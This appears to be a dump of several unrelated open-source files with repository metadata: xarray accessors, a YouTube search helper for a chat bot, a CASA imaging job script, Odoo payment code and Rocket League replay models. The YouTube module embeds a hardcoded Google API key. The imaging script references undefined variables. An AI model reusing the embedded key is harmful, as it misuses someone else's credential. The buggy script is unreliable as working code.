is_year_end = Properties._tslib_field_accessor(
"is_year_end", "Indicate whether the date is the last day of the year.", bool
)
is_leap_year = Properties._tslib_field_accessor(
"is_leap_year", "Boolean indicator if the date belongs to a leap year.", bool
)
class TimedeltaAccessor(Properties):
"""Access Timedelta fields for DataArrays with Timedelta-like dtypes.
Fields can be accessed through the `.dt` attribute for applicable DataArrays.
Examples
--------
>>> import pandas as pd
>>> import xarray as xr
>>> dates = pd.timedelta_range(start="1 day", freq="6H", periods=20)
>>> ts = xr.DataArray(dates, dims=("time"))
>>> ts
<xarray.DataArray (time: 20)>
array([ 86400000000000, 108000000000000, 129600000000000, 151200000000000,
172800000000000, 194400000000000, 216000000000000, 237600000000000,
259200000000000, 280800000000000, 302400000000000, 324000000000000,
345600000000000, 367200000000000, 388800000000000, 410400000000000,
432000000000000, 453600000000000, 475200000000000, 496800000000000],
dtype='timedelta64[ns]')
Coordinates:
* time (time) timedelta64[ns] 1 days 00:00:00 ... 5 days 18:00:00
>>> ts.dt
<xarray.core.accessor_dt.TimedeltaAccessor object at 0x109a27d68>
>>> ts.dt.days
<xarray.DataArray 'days' (time: 20)>
array([1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5])
Coordinates:
* time (time) timedelta64[ns] 1 days 00:00:00 ... 5 days 18:00:00
>>> ts.dt.microseconds
<xarray.DataArray 'microseconds' (time: 20)>
array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
Coordinates:
* time (time) timedelta64[ns] 1 days 00:00:00 ... 5 days 18:00:00
>>> ts.dt.seconds
<xarray.DataArray 'seconds' (time: 20)>
array([ 0, 21600, 43200, 64800, 0, 21600, 43200, 64800, 0,
21600, 43200, 64800, 0, 21600, 43200, 64800, 0, 21600,
43200, 64800])
Coordinates:
* time (time) timedelta64[ns] 1 days 00:00:00 ... 5 days 18:00:00
"""
days = Properties._tslib_field_accessor(
"days", "Number of days for each element.", np.int64
)
seconds = Properties._tslib_field_accessor(
"seconds",
"Number of seconds (>= 0 and less than 1 day) for each element.",
np.int64,
)
microseconds = Properties._tslib_field_accessor(
"microseconds",
"Number of microseconds (>= 0 and less than 1 second) for each element.",
np.int64,
)
nanoseconds = Properties._tslib_field_accessor(
"nanoseconds",
"Number of nanoseconds (>= 0 and less than 1 microsecond) for each element.",
np.int64,
)
class CombinedDatetimelikeAccessor(DatetimeAccessor, TimedeltaAccessor):
def __new__(cls, obj):
# CombinedDatetimelikeAccessor isn't really instatiated. Instead
# we need to choose which parent (datetime or timedelta) is
# appropriate. Since we're checking the dtypes anyway, we'll just
# do all the validation here.
if not _contains_datetime_like_objects(obj):
raise TypeError(
"'.dt' accessor only available for "
"DataArray with datetime64 timedelta64 dtype or "
"for arrays containing cftime datetime "
"objects."
)
if is_np_timedelta_like(obj.dtype):
return TimedeltaAccessor(obj)
else:
return DatetimeAccessor(obj)
| apache-2.0 | 4,147,006,790,076,963,300 | 33.560086 | 90 | 0.626824 | false |
nortxort/tinybot-rtc | apis/youtube.py | 1 | 8787 | # -*- coding: utf-8 -*-
""" Contains functions to fetch info from youtube's API (googleapis.com/youtube/v3/) """
import logging
import util.web
import _track
from util import string_util
API_KEY = 'AIzaSyCPQe4gGZuyVQ78zdqf9O5iEyfVLPaRwZg'
ALLOWED_COUNTRIES = ['DK', 'PL', 'UK']
REFERER = 'https://tinychat.com'
SEARCH_URL = 'https://www.googleapis.com/youtube/v3/search?' \
'type=video&key={0}&maxResults=50&q={1}&part=snippet'
PLAYLIST_SEARCH_URL = 'https://www.googleapis.com/youtube/v3/search?' \
'type=playlist&key={0}&maxResults=50&q={1}&part=snippet'
PLAYLIST_ITEMS_URL = 'https://www.googleapis.com/youtube/v3/playlistItems?' \
'key={0}&playlistId={1}&maxResults=50&part=snippet,id'
VIDEO_DETAILS_URL = 'https://www.googleapis.com/youtube/v3/videos?' \
'id={1}&key={0}&part=contentDetails,snippet'
log = logging.getLogger(__name__)
def search(search_term):
"""
Searches the youtube API for a youtube video matching the search term.
A json response of ~50 possible items matching the search term will be presented.
Each video_id will then be checked by video_details() until a candidate has been found
and the resulting Track can be returned.
:param search_term: The search term str to search for.
:type search_term: str
:return: A Track object or None on error.
:rtype: Track | None
"""
url = SEARCH_URL.format(API_KEY, util.web.quote(search_term.encode('ascii', 'ignore')))
response = util.web.http_get(url=url, json=True, referer=REFERER)
_error = None
if response['json'] is not None:
track = None
if 'items' in response['json']:
try:
for item in response['json']['items']:
video_id = item['id']['videoId']
details = video_details(video_id)
if details is not None:
track = details
break
except KeyError as ke:
_error = ke
finally:
if _error is not None:
log.error(_error)
return None
return track
def search_list(search_term, results=10):
"""
Searches the API of youtube for videos matching the search term.
Instead of returning only one video matching the search term, we return a list of candidates.
:param search_term: The search term to search for.
:type search_term: str
:param results: Amount of items in the list.
:type results: int
:return: A list of Track objects or None on error.
:rtype: list | None
"""
url = SEARCH_URL.format(API_KEY, util.web.quote(search_term.encode('ascii', 'ignore')))
response = util.web.http_get(url=url, json=True, referer=REFERER)
_error = None
if response['json'] is not None:
track_list = []
if 'items' in response['json']:
try:
for i, item in enumerate(response['json']['items']):
if i == results:
return track_list
else:
video_id = item['id']['videoId']
track = video_details(video_id)
if track is not None:
track_list.append(track)
except KeyError as ke:
_error = ke
finally:
if _error is not None:
log.error(_error)
return None
return track_list
def playlist_search(search_term, results=5):
"""
Searches youtube for a playlist matching the search term.
:param search_term: The search term to search to search for.
:type search_term: str
:param results: the number of playlist matches we want returned.
:type results: int
:return: A list of dictionaries with the keys: ´playlist_title´, ´playlist_id´
:rtype: list | None
"""
url = PLAYLIST_SEARCH_URL.format(API_KEY, util.web.quote(search_term.encode('ascii', 'ignore')))
response = util.web.http_get(url=url, json=True, referer=REFERER)
_error = None
if response['json'] is not None:
play_lists = []
if 'items' in response['json']:
try:
for i, item in enumerate(response['json']['items']):
if i == results:
return play_lists
playlist_id = item['id']['playlistId']
playlist_title = item['snippet']['title'] #
play_list_info = {
'playlist_title': playlist_title,
'playlist_id': playlist_id
}
play_lists.append(play_list_info)
except KeyError as ke:
_error = ke
finally:
if _error is not None:
log.error(_error)
return None
return play_lists
def playlist_videos(playlist_id):
"""
Find the videos for a given playlist ID.
The list returned will contain a maximum of 50 videos.
:param playlist_id: The playlist ID
:type playlist_id: str
:return: A list ofTrack objects.
:rtype: list | None
"""
url = PLAYLIST_ITEMS_URL.format(API_KEY, playlist_id)
response = util.web.http_get(url=url, json=True, referer=REFERER)
_error = None
if response['json'] is not None:
video_list = []
# next_page_token = response['json']['nextPageToken']
if 'items' in response['json']:
try:
for item in response['json']['items']:
video_id = item['snippet']['resourceId']['videoId']
track = video_details(video_id)
if track is not None:
video_list.append(track)
except KeyError as ke:
_error = ke
finally:
if _error is not None:
log.error(_error)
return None
return video_list
def video_details(video_id, check=True):
"""
Youtube helper function to get the video time for a given video id.
Checks a youtube video id to see if the video is blocked or allowed
in the ALLOWED_COUNTRIES list. If a video is blocked in one of the countries,
None is returned. If a video is NOT allowed in ONE of the countries,
None is returned else a Track object will be returned.
:param video_id: The youtube video id to check.
:type video_id: str
:param check: check for region restriction. Default: True
:type check: bool
:return: A Track object.
:rtype: Track | None
"""
url = VIDEO_DETAILS_URL.format(API_KEY, video_id)
response = util.web.http_get(url=url, json=True, referer=REFERER)
_error = None
if response['json'] is not None:
if 'items' in response['json']:
track = None
if len(response['json']['items']) != 0:
try:
content_details = response['json']['items'][0]['contentDetails']
if check:
if 'regionRestriction' in content_details:
if 'blocked' in content_details['regionRestriction']:
blocked = content_details['regionRestriction']['blocked']
if [i for e in ALLOWED_COUNTRIES for i in blocked if e in i]:
log.info('%s is blocked in: %s' % (video_id, blocked))
return None
if 'allowed' in content_details['regionRestriction']:
allowed = content_details['regionRestriction']['allowed']
if [i for e in ALLOWED_COUNTRIES for i in allowed if e not in i]:
log.info('%s is allowed in: %s' % (video_id, allowed))
return None
video_time = string_util.convert_to_seconds(content_details['duration'])
video_title = response['json']['items'][0]['snippet']['title']
image_medium = response['json']['items'][0]['snippet']['thumbnails']['medium']['url']
track = _track.Track(video_id=video_id, video_time=video_time, video_title=video_title,
image=image_medium)
except KeyError as ke:
_error = ke
finally:
if _error is not None:
log.error(_error)
return None
return track
| mit | -1,263,738,826,153,310,200 | 34.273092 | 107 | 0.542525 | false |
e-koch/VLA_Lband | 14B-088/HI/imaging/imaging_tests/sd_combo_tests/sd_combo_imaging.py | 1 | 2852 |
'''
Compare feathering with different SD data.
'''
import os
from shutil import copytree
from copy import copy
import subprocess
# Job parameters
NODE = "1"
PROCS = "12"
PMEM = "4000mb"
HOURS = "72"
# Run imaging tests w/ different parameters/CASA versions
output_path = os.path.expanduser("~/m33/14B-088/testing")
os.chdir(output_path)
filename = os.path.expanduser("~/code_repos/VLA_Lband/14B-088/HI/imaging/"
"imaging_tests/sd_combo_tests/"
"HI_single_channel_tclean.py")
ms_name = "14B-088_HI_LSRK.ms.contsub_channel_1000.ms"
maskname = "M33_14B-088_HI_mask_modified_channel_330.image"
modelnames = {"Arecibo": "M33_14B-088_HI_model_channel_330.image",
"Effelsburg": "",
"GBT": "",
"None": "None"}
casa_call = os.path.expanduser("~/casa-release-4.7.0-el6/bin/casa")
call = 'qsub -N JOB_NAME -l nodes=NODE:ppn=PROCS,pmem=PMEM,' \
'walltime=HOURS:00:00 -d . <<< "VERSION --logfile JOB_NAME.log -c' \
'FILENAME MS_NAME MODEL USE_MODEL MASK OUT_ROOT"'
# Set job parameters. Name is done in the loop.
call = call.replace("NODE", NODE)
call = call.replace("PROCS", PROCS)
call = call.replace("PMEM", PMEM)
call = call.replace("HOURS", HOURS)
call = call.replace("FILENAME", filename)
call = call.replace("MS_NAME", ms_name)
# Now loop through all combinations
for tele in modelnames:
for use_cleanmodel in [True, False]:
# Don't run the no-SD case twice.
if tele == "None" and not use_cleanmodel:
continue
JOB_NAME = "{0}.Model_{1}.AsCleanModel_{2}"\
.format(ms_name[:-3],
tele,
use_cleanmodel)
new_call = copy(call)
new_call = new_call.replace("JOB_NAME", JOB_NAME)
new_call = new_call.replace("MODEL", modelnames[tele])
new_call = new_call.replace("USE_MODEL", use_cleanmodel)
new_call = new_call.replace("MASK", maskname)
new_call = new_call.replace("OUT_ROOT", JOB_NAME)
job_folder = os.path.join(output_path, JOB_NAME)
# Assume that the data are already copied if the folder
# exists.
if not os.path.exists(job_folder):
os.mkdir(job_folder)
# Copy the ms, and the model and mask, if needed.
copytree(ms_name, os.path.join(job_folder,
ms_name))
if model is not None:
copytree(model, os.path.join(job_folder,
model))
if mask is not None:
copytree(mask, os.path.join(job_folder, mask))
os.chdir(job_folder)
sp = subprocess.Popen(["/bin/bash", "-i", "-c",
new_call])
sp.communicate()
os.chdir(output_path)
| mit | -7,503,296,971,442,701,000 | 30.340659 | 74 | 0.576438 | false |
south-coast-science/scs_mfr | src/scs_mfr/host_id.py | 1 | 1107 | #!/usr/bin/env python3
"""
Created on 16 Apr 2017
@author: Bruno Beloff ([email protected])
DESCRIPTION
The host_id utility reports the serial number of the host system processor board. The meaning of "serial number" is
implemented differently on each platform:
* Raspberry Pi: /proc/cpuinfo
* BeagleBone: hexdump -e '8/1 \"%c\"' /sys/bus/i2c/devices/0-0050/eeprom -s 16 -n 12
The host_id utility should be made available to the scs_dev/control_receiver in order that the host serial number
can be verified by a remote management system.
SYNOPSIS
host_id.py
EXAMPLES
./host_id.py
DOCUMENT EXAMPLE
"0000000040d4d158"
BUGS
On Raspberry Pi, the host ID appears to be derived from the MAC address of the active interface, and is therefore
unreliable on multi-homed hosts.
"""
from scs_core.data.json import JSONify
from scs_host.sys.host import Host
# --------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
serial_number = Host.serial_number()
print(JSONify.dumps(serial_number))
| mit | 4,752,368,238,099,504,000 | 24.159091 | 118 | 0.669377 | false |
shendo/netsink | tests/test_sslwrap.py | 1 | 1274 | # Netsink - Network Sinkhole for Isolated Malware Analysis
# Copyright (C) 2013-2014 Steve Henderson
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import SocketServer
import ssl
import thread
from netsink.config import ModuleConfig
from netsink.modules import sslwrap
def test_sslhandler():
server = SocketServer.TCPServer(('', 0), sslwrap.SSLHandler)
server.cfg = ModuleConfig('ssl.conf').cfg
thread.start_new_thread(server.serve_forever, ())
client = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
client.connect(('127.0.0.1', server.socket.getsockname()[1]))
assert client.ssl_version >= 2
| gpl-3.0 | 6,994,835,708,226,046,000 | 36.5 | 79 | 0.737049 | false |
ingadhoc/account-financial-tools | account_ux/models/account_payment.py | 1 | 1171 | # © 2016 ADHOC SA
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields
import datetime
class AccountPayment(models.Model):
_inherit = "account.payment"
def _get_liquidity_move_line_vals(self, amount):
vals = super()._get_liquidity_move_line_vals(amount)
days_for_collection = False
journal = self.journal_id
if (self.payment_method_code == 'inbound_debit_card'):
days_for_collection = journal.debit_card_days_for_collection
elif (self.payment_method_code == 'inbound_credit_card'):
days_for_collection = journal.credit_card_days_for_collection
if days_for_collection:
vals['date_maturity'] = fields.Date.to_string(
fields.Date.from_string(
self.payment_date) + datetime.timedelta(days=10))
return vals
def action_draft(self):
"""
On payment back to draft delete move_name as we wont to allow deletion of
payments. TODO: this could be parametrizable
"""
res = super().action_draft()
self.write({'move_name': False})
return res
| agpl-3.0 | 9,087,780,728,242,621,000 | 35.5625 | 81 | 0.625641 | false |
rocket-league-replays/rocket-league-replays | rocket_league/apps/replays/models.py | 1 | 27055 | import logging
import math
import re
from itertools import zip_longest
import bitstring
from django.conf import settings
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.utils.functional import cached_property
from django.utils.safestring import mark_safe
from django.utils.timezone import now
from pyrope import Replay as Pyrope
from social.apps.django_app.default.fields import JSONField
from .parser import parse_replay_header, parse_replay_netstream
logger = logging.getLogger('rocket_league')
PRIVACY_PRIVATE = 1
PRIVACY_UNLISTED = 2
PRIVACY_PUBLIC = 3
PLATFORM_UNKNOWN = 0
PLATFORM_STEAM = 1
PLATFORM_PSN = 2
PLATFORM_XBOX = 4
PLATFORM_SWITCH = 6
PLATFORMS = {
'Unknown': PLATFORM_UNKNOWN,
'Steam': PLATFORM_STEAM,
'PlayStation': PLATFORM_PSN,
'Xbox': PLATFORM_XBOX,
'Switch': PLATFORM_SWITCH,
}
PLATFORMS_MAPPINGS = {
'unknown': PLATFORM_UNKNOWN,
'steam': PLATFORM_STEAM,
'Steam': PLATFORM_STEAM,
'PlayStation': PLATFORM_PSN,
'playstation': PLATFORM_PSN,
'ps4': PLATFORM_PSN,
'Xbox': PLATFORM_XBOX,
'xbox': PLATFORM_XBOX,
'xboxone': PLATFORM_XBOX,
'switch': PLATFORM_SWITCH,
'Switch': PLATFORM_SWITCH,
'OnlinePlatform_PS4': PLATFORM_PSN,
'OnlinePlatform_Unknown': PLATFORM_UNKNOWN,
'OnlinePlatform_Dingo': PLATFORM_XBOX,
'OnlinePlatform_Steam': PLATFORM_STEAM,
'OnlinePlatform_NNX': PLATFORM_SWITCH,
"{'Value': ['OnlinePlatform', 'OnlinePlatform_Steam']}": PLATFORM_STEAM,
"{'Value': ['OnlinePlatform', 'OnlinePlatform_Dingo']}": PLATFORM_XBOX,
"{'Value': ['OnlinePlatform', 'OnlinePlatform_PS4']}": PLATFORM_PSN,
"{'Value': ['OnlinePlatform', 'OnlinePlatform_Unknown']}": PLATFORM_UNKNOWN,
# The next values are used for the official API.
PLATFORM_UNKNOWN: 'unknown',
str(PLATFORM_UNKNOWN): 'unknown',
PLATFORM_STEAM: 'steam',
str(PLATFORM_STEAM): 'steam',
PLATFORM_PSN: 'ps4',
str(PLATFORM_PSN): 'ps4',
PLATFORM_XBOX: 'xboxone',
str(PLATFORM_XBOX): 'xboxone',
PLATFORM_SWITCH: 'switch',
str(PLATFORM_SWITCH): 'switch',
None: PLATFORM_UNKNOWN,
}
class Season(models.Model):
title = models.CharField(
max_length=100,
unique=True,
)
start_date = models.DateTimeField()
def __str__(self):
return self.title
class Meta:
ordering = ['-start_date']
def get_default_season():
if Season.objects.count() == 0:
season = Season.objects.create(
title='Season 1',
start_date='2015-07-07' # Game release date
)
return season.pk
return Season.objects.filter(
start_date__lte=now(),
)[0].pk
class Map(models.Model):
title = models.CharField(
max_length=100,
blank=True,
null=True,
)
slug = models.CharField(
max_length=100,
)
image = models.FileField(
upload_to='uploads/files',
blank=True,
null=True,
)
def __str__(self):
return self.title or self.slug
class Meta:
ordering = ['title']
class Replay(models.Model):
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
blank=True,
null=True,
db_index=True,
)
season = models.ForeignKey(
Season,
default=get_default_season,
)
title = models.CharField(
"replay name",
max_length=128,
blank=True,
null=True,
)
playlist = models.PositiveIntegerField(
choices=[(v, k) for k, v in settings.PLAYLISTS.items()],
default=0,
blank=True,
null=True,
)
file = models.FileField(
upload_to='uploads/replay_files',
)
heatmap_json_file = models.FileField(
upload_to='uploads/replay_json_files',
blank=True,
null=True,
)
location_json_file = models.FileField(
upload_to='uploads/replay_location_json_files',
blank=True,
null=True,
)
replay_id = models.CharField(
"replay ID",
max_length=100,
blank=True,
null=True,
db_index=True,
)
player_name = models.CharField(
max_length=100,
blank=True,
null=True,
)
player_team = models.IntegerField(
default=0,
blank=True,
null=True,
)
map = models.ForeignKey(
Map,
blank=True,
null=True,
db_index=True,
)
server_name = models.CharField(
max_length=100,
blank=True,
null=True,
)
timestamp = models.DateTimeField(
blank=True,
null=True,
)
date_created = models.DateTimeField(
default=now,
)
team_sizes = models.PositiveIntegerField(
blank=True,
null=True,
db_index=True,
)
team_0_score = models.IntegerField(
default=0,
blank=True,
null=True,
db_index=True,
)
team_1_score = models.IntegerField(
default=0,
blank=True,
null=True,
db_index=True,
)
match_type = models.CharField(
max_length=16,
blank=True,
null=True,
)
privacy = models.PositiveIntegerField(
'replay privacy',
choices=[
(PRIVACY_PRIVATE, 'Private'),
(PRIVACY_UNLISTED, 'Unlisted'),
(PRIVACY_PUBLIC, 'Public')
],
default=3,
)
# Parser V2 values.
keyframe_delay = models.FloatField(
blank=True,
null=True,
)
max_channels = models.IntegerField(
default=1023,
blank=True,
null=True,
)
max_replay_size_mb = models.IntegerField(
"max replay size (MB)",
default=10,
blank=True,
null=True,
)
num_frames = models.IntegerField(
blank=True,
null=True,
)
record_fps = models.FloatField(
"record FPS",
default=30.0,
blank=True,
null=True,
)
shot_data = JSONField(
blank=True,
null=True,
)
excitement_factor = models.FloatField(
default=0.00,
)
show_leaderboard = models.BooleanField(
default=False,
)
average_rating = models.PositiveIntegerField(
blank=True,
null=True,
default=0,
)
crashed_heatmap_parser = models.BooleanField(
default=False,
)
processed = models.BooleanField(
default=False,
)
@cached_property
def uuid(self):
return re.sub(r'([A-F0-9]{8})([A-F0-9]{4})([A-F0-9]{4})([A-F0-9]{4})([A-F0-9]{12})', r'\1-\2-\3-\4-\5', self.replay_id).lower()
def team_x_player_list(self, team):
return [
"{}{}".format(
player.player_name,
" ({})".format(player.goal_set.count()) if player.goal_set.count() > 0 else '',
) for player in self.player_set.filter(
team=team,
)
]
def team_x_players(self, team):
return ', '.join(self.team_x_player_list(team))
def team_0_players(self):
return self.team_x_players(0)
def team_1_players(self):
return self.team_x_players(1)
def team_0_player_list(self):
return self.team_x_player_list(0)
def team_1_player_list(self):
return self.team_x_player_list(1)
def player_pairs(self):
return zip_longest(self.team_0_player_list(), self.team_1_player_list())
@cached_property
def region(self):
if not self.server_name:
return 'N/A'
match = re.search(settings.SERVER_REGEX, self.server_name)
if match:
return match.groups()[1]
return 'N/A'
def lag_report_url(self):
base_url = 'https://psyonixhr.wufoo.com/forms/game-server-performance-report'
if not self.server_name:
return base_url
# Split out the server name.
match = re.search(r'(EU|USE|USW|OCE|SAM)(\d+)(-([A-Z][a-z]+))?', self.server_name).groups()
return "{}/def/field1={}&field2={}&field13={}".format(
base_url,
*match
)
@cached_property
def match_length(self):
if not self.num_frames or not self.record_fps:
return 'N/A'
calculation = self.num_frames / self.record_fps
minutes, seconds = divmod(calculation, 60)
return '%d:%02d' % (
int(minutes),
int(seconds),
)
def calculate_excitement_factor(self):
# Multiplers for use in factor tweaking.
swing_rating_multiplier = 8
goal_count_multiplier = 1.2
# Calculate how the swing changed throughout the game.
swing = 0
swing_values = []
for goal in self.goal_set.all():
if goal.player.team == 0:
swing -= 1
else:
swing += 1
swing_values.append(swing)
if self.team_0_score > self.team_1_score:
# Team 0 won, but were they ever losing?
deficit_values = [x for x in swing_values if x < 0]
if deficit_values:
deficit = max(swing_values)
else:
deficit = 0
score_min_def = self.team_0_score - deficit
else:
# Team 1 won, but were they ever losing?
deficit_values = [x for x in swing_values if x < 0]
if deficit_values:
deficit = abs(min(deficit_values))
else:
deficit = 0
score_min_def = self.team_1_score - deficit
if score_min_def != 0:
swing_rating = float(deficit) / score_min_def * swing_rating_multiplier
else:
swing_rating = 0
# Now we have the swing rating, adjust it by the total number of goals.
# This gives us a "base value" for each replay and allows replays with
# lots of goals but not much swing to get reasonable rating. Cap the goal
# multiplier at 5.
total_goals = self.team_0_score + self.team_1_score
if total_goals > 5:
total_goals = 5
swing_rating += total_goals * goal_count_multiplier
return swing_rating
def calculate_average_rating(self):
from ..users.models import LeagueRating
players = self.player_set.exclude(
online_id__isnull=True,
)
num_player_ratings = 0
total_player_ratings = 0
for player in players:
try:
# Get the latest rating for this player.
rating = LeagueRating.objects.get(
platform=player.platform,
online_id=player.online_id,
playlist=self.playlist,
)
total_player_ratings += rating.tier
num_player_ratings += 1
except LeagueRating.DoesNotExist:
# Should we get the ratings?
continue
if num_player_ratings > 0:
return math.ceil(total_player_ratings / num_player_ratings)
return 0
def eligible_for_feature(self, feature):
features = {
'playback': settings.PATREON_PLAYBACK_PRICE,
'boost_analysis': settings.PATREON_BOOST_PRICE,
}
patreon_amount = features[feature]
# Import here to avoid circular imports.
from ..site.templatetags.site import patreon_pledge_amount
# Is the uploader a patron?
if self.user:
pledge_amount = patreon_pledge_amount({}, user=self.user)
if pledge_amount >= patreon_amount:
return True
# Are any of the players patron?
players = self.player_set.filter(
platform__in=['OnlinePlatform_Steam', '1'],
)
for player in players:
pledge_amount = patreon_pledge_amount({}, steam_id=player.online_id)
if pledge_amount >= patreon_amount:
return True
return False
@property
def queue_priority(self):
# Returns one of 'tournament', 'priority', 'general', where 'tournament'
# is the highest priority.
# TODO: Add tournament logic.
if self.eligible_for_playback:
return 'priority'
return 'general'
# Feature eligibility checks.
@cached_property
def eligible_for_playback(self):
return self.eligible_for_feature('playback')
@cached_property
def show_playback(self):
# First of all, is there even a JSON file?
if not self.location_json_file:
return False
return self.eligible_for_feature('playback')
@cached_property
def eligible_for_boost_analysis(self):
return self.eligible_for_feature('boost_analysis')
@cached_property
def show_boost_analysis(self):
# Have we got any boost data yet?
if self.boostdata_set.count() == 0:
return False
return self.eligible_for_feature('boost_analysis')
# Other stuff
@cached_property
def get_human_playlist(self):
if not self.playlist:
return 'Unknown'
display = self.get_playlist_display()
if display == self.playlist:
display = 'Unknown'
return settings.HUMAN_PLAYLISTS.get(self.playlist, display)
def get_absolute_url(self):
if self.replay_id:
return reverse('replay:detail', kwargs={
'replay_id': re.sub(r'([A-F0-9]{8})([A-F0-9]{4})([A-F0-9]{4})([A-F0-9]{4})([A-F0-9]{12})', r'\1-\2-\3-\4-\5', self.replay_id).lower(),
})
return reverse('replay:detail', kwargs={
'pk': self.pk,
})
class Meta:
ordering = ['-timestamp', '-pk']
def __str__(self):
return self.title or str(self.pk) or '[{}] {} {} game on {}. Final score: {}, Uploaded by {}.'.format(
self.timestamp,
'{size}v{size}'.format(size=self.team_sizes),
self.match_type,
self.map,
'{}-{}'.format(self.team_0_score, self.team_1_score),
self.player_name,
)
def clean(self):
if self.pk:
return
if self.file:
# Ensure we're at the start of the file as `clean()` can sometimes
# be called multiple times (for some reason..)
self.file.seek(0)
file_url = self.file.url # To help the exception handler
try:
replay = Pyrope(self.file.read())
except bitstring.ReadError:
raise ValidationError("The file you selected does not seem to be a valid replay file.")
# Check if this replay has already been uploaded.
replays = Replay.objects.filter(
replay_id=replay.header['Id'],
)
if replays.count() > 0:
raise ValidationError(mark_safe("This replay has already been uploaded, <a target='_blank' href='{}'>you can view it here</a>.".format(
replays[0].get_absolute_url()
)))
self.replay_id = replay.header['Id']
def save(self, *args, **kwargs):
parse_netstream = False
if 'parse_netstream' in kwargs:
parse_netstream = kwargs.pop('parse_netstream')
super(Replay, self).save(*args, **kwargs)
if self.file and not self.processed:
try:
if parse_netstream:
# Header parse?
parse_replay_netstream(self.pk)
else:
parse_replay_header(self.pk)
except:
logger.exception('Replay save failed')
class Player(models.Model):
replay = models.ForeignKey(
Replay,
)
player_name = models.CharField(
max_length=100,
db_index=True,
)
team = models.IntegerField()
# 1.06 data
score = models.PositiveIntegerField(
default=0,
blank=True,
)
goals = models.PositiveIntegerField(
default=0,
blank=True,
)
shots = models.PositiveIntegerField(
default=0,
blank=True,
)
assists = models.PositiveIntegerField(
default=0,
blank=True,
)
saves = models.PositiveIntegerField(
default=0,
blank=True,
)
platform = models.CharField(
max_length=100,
blank=True,
null=True,
db_index=True,
)
online_id = models.CharField(
max_length=128,
blank=True,
null=True,
db_index=True,
)
bot = models.BooleanField(
default=False,
)
spectator = models.BooleanField(
default=False,
)
heatmap = models.FileField(
upload_to='uploads/heatmap_files',
blank=True,
null=True,
)
user_entered = models.BooleanField(
default=False,
)
# Taken from the netstream.
actor_id = models.PositiveIntegerField(
default=0,
blank=True,
null=True,
)
unique_id = models.CharField(
max_length=128,
blank=True,
null=True,
)
party_leader = models.ForeignKey(
'self',
blank=True,
null=True,
)
camera_settings = JSONField(
blank=True,
null=True,
)
vehicle_loadout = JSONField(
blank=True,
null=True,
)
total_xp = models.IntegerField(
default=0,
blank=True,
null=True,
)
# Other stuff.
boost_data = JSONField(
blank=True,
null=True,
)
@cached_property
def get_rating_data(self):
from ..users.models import LeagueRating
from ..users.templatetags.ratings import tier_name
if self.replay.playlist not in settings.RANKED_PLAYLISTS:
return
try:
rating = LeagueRating.objects.get_or_request(
platform=self.platform,
online_id=self.online_id if PLATFORMS_MAPPINGS[self.platform] == PLATFORM_STEAM else self.player_name,
playlist=self.replay.playlist,
)
if not rating:
return {
'image': static('img/tiers/icons/0.png'),
'tier_name': tier_name(0)
}
return {
'image': static('img/tiers/icons/{}.png'.format(rating.tier)),
'tier_name': tier_name(rating.tier)
}
except LeagueRating.DoesNotExist:
pass
return {
'image': static('img/tiers/icons/0.png'),
'tier_name': 'Unranked'
}
@cached_property
def vehicle_data(self):
"""
{
"RocketTrail": {"Name": "Boost_HolyLight", "Id": 44},
"Topper": {"Name": "Hat_Tiara", "Id": 495},
"Version": 12,
"Wheels": {"Name": "WHEEL_Atlantis", "Id": 359},
"Body": {"Name": "Body_Force", "Id": 22},
"Antenna": {"Name": null, "Id": 0},
"Decal": {"Name": "Skin_Force_Junk", "Id": 1178},
"Unknown2": 0,
"Unknown1": 0
}
"""
components = {}
if not self.vehicle_loadout:
return components
if type(self.vehicle_loadout) == list:
"""
[
403, # Body
0, # Decal. 330 = Flames
376, # Wheels. 386 = Christiano, 376 = OEM
63, # Rocket Trail. 578 = Candy Corn
0, # Antenna. 1 = 8-Ball
0, # Topper. 796 = Deadmau5
0 #
],
"""
if len(self.vehicle_loadout) == 9:
self.vehicle_loadout = self.vehicle_loadout[1:-1]
assert len(self.vehicle_loadout) == 7
component_maps = [
'body',
'decal',
'wheels',
'trail',
'antenna',
'topper',
]
for index, component in enumerate(self.vehicle_loadout):
if component > 0:
get_component = Component.objects.filter(
type=component_maps[index],
internal_id=component,
)
if get_component.exists():
components[component_maps[index]] = get_component[0]
else:
components[component_maps[index]] = Component.objects.create(
type=component_maps[index],
internal_id=component,
name='Unknown',
)
elif type(self.vehicle_loadout) == dict:
component_maps = {
'Body': {'type': 'body', 'replace': 'Body_'},
'Decal': {'type': 'decal', 'replace': 'Skin_'},
'Wheels': {'type': 'wheels', 'replace': 'WHEEL_'},
'RocketTrail': {'type': 'trail', 'replace': 'Boost_'},
'Antenna': {'type': 'antenna', 'replace': 'Antenna '},
'Topper': {'type': 'topper', 'replace': 'Hat_'},
}
for component_type, mappings in component_maps.items():
if component_type in self.vehicle_loadout and self.vehicle_loadout[component_type]['Name']:
try:
components[mappings['type']] = Component.objects.get_or_create(
type=mappings['type'],
internal_id=self.vehicle_loadout[component_type]['Id'],
defaults={
'name': self.vehicle_loadout[component_type]['Name'].replace(mappings['replace'], '').replace('_', ' ')
}
)[0]
if components[mappings['type']].name == 'Unknown':
components[mappings['type']].name = self.vehicle_loadout[component_type]['Name'].replace(mappings['replace'], '').replace('_', ' ')
components[mappings['type']].save()
except Exception:
pass
return components
def get_absolute_url(self):
if self.bot or self.platform == '0' or not self.platform:
return '#1'
try:
return reverse('users:player', kwargs={
'platform': PLATFORMS_MAPPINGS[self.platform],
'player_id': self.online_id if int(self.platform) == PLATFORM_STEAM else self.player_name,
})
